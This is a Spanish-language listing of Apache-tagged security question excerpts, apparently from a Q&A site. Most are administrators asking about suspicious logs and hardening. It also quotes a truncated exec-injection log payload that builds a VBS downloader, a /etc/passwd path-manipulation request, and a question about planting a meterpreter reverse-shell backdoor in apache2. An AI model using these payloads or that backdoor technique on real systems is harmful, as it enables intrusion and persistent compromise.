Preguntas con etiqueta 'apache'

4
respuestas

Actividad extraña en el registro de acceso httpd de Apache [duplicado]

He configurado un servidor Apache / 2.2.22 (Debian) en mi Rasberry Pi. Mirando mi access.log, veo un poco de actividad extraña que consiste principalmente en GETs, lo cual es bastante desconcertante, ya que soy un novato en estos temas. Lo más...
hecha 20.01.2014 - 19:06
1
respuesta

La inyección de meterpreter / reverse_tcp en apache2 con msfvenom da como resultado la falla de apache2

He estado tratando de usar msfvenom con el linux/x86/meterpreter/reverse_tcp payload y un binario apache2. Mi intención es crear una versión contaminada de apache2 para establecer una puerta trasera persistente en la máquina de destino. A...
hecha 18.09.2015 - 22:06
1
respuesta

¿Es un riesgo ejecutar módulos antiguos en Apache?

Acabo de ver que mi proveedor de servicios está ejecutando módulos extremadamente antiguos en Apache. La versión cURL tiene 3 años de antigüedad, SQLLite es del 24 de octubre de 2014 y la versión zlib es 1.2.8 en lugar de 1.2.11. Además, está...
hecha 01.10.2017 - 10:53
2
respuestas

El servidor Apache mantiene la conexión HTTPS con el servidor misterioso (¿Secuestro?)

He estado en un plan de alojamiento web compartido durante 10 años y recientemente cambié todos mis sitios (varios sitios de WordPress y complementos asociados, todos en PHP, un sitio de MediaWiki y muchas cosas estáticas) a mi propio VPS . Yay...
hecha 06.08.2014 - 07:54
2
respuestas

Bloquear solicitudes que contengan la URL de otros sitios web

   GET / HTTP / 1.1 "200 166113" - "" Mozilla / 5.0 (compatible; dsada / 2.0; + enlace ) Encontré esta solicitud repetida continuamente en mis registros. ¿Cómo puedo evitar esto (solicitudes que contienen URL de otros sitios web)?     
hecha 16.07.2016 - 05:23
2
respuestas

¿Cómo omitir la protección .htaccess? [cerrado]

¿Hay alguna forma de evitar un directorio protegido por el archivo .htaccess? Jugué un desafío en CTF y no pude acceder a la ruta donde está la bandera. Intenté acceder a http://www.example.com/flag en un desafío, pero no puedo pasar p...
hecha 10.01.2018 - 20:33
2
respuestas

Mi VPS se ha cerrado ahora otra vez por segunda vez por violaciones de TOS, y realmente necesito ayuda. [cerrado]

Mi VPS se ha cerrado ahora nuevamente por segunda vez por violaciones de TOS (correo electrónico no deseado), y realmente necesito ayuda. He estado luchando con mi servidor siendo atacado por más de un año. La mayoría de mis sitios ejecutan Joom...
hecha 26.07.2013 - 05:10
1
respuesta

Permisos de archivos incorrectos para LAMP [cerrado]

He instalado Apache 2.4.6 en mi servidor y tengo la siguiente configuración de host virtual: <VirtualHost *:80> ServerAdmin webmaster@localhost ServerName foobar1.com DocumentRoot /home/john/foobar1/foobar1.com <Direct...
hecha 01.09.2013 - 12:04
1
respuesta

¿Es este nuevo intento de hackeo algo de qué preocuparse?

- - [22/Sep/2014:13:54:24 -0600] "GET /?search==%00{.exec|cmd.exe +%2Fc +echo%3E22222.vbs +dim +wait%2Cquit%2Cout%3ASet +xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3ASet +WshShell +%3D+Wscript.CreateObject%28%22WScript.Shell%22%29 +%3ADS%3D...
hecha 23.09.2014 - 21:08
1
respuesta

Evita manipulaciones de URL, incluyendo / proc y / etc con fail2ban

Recibo muchos ataques en mi servidor apache de Debian que incluyen manipulaciones de URL como http://url_on_my_eserver/?username=/etc/passwd ¿Cómo puedo bloquear estos ataques?     
hecha 17.12.2012 - 13:42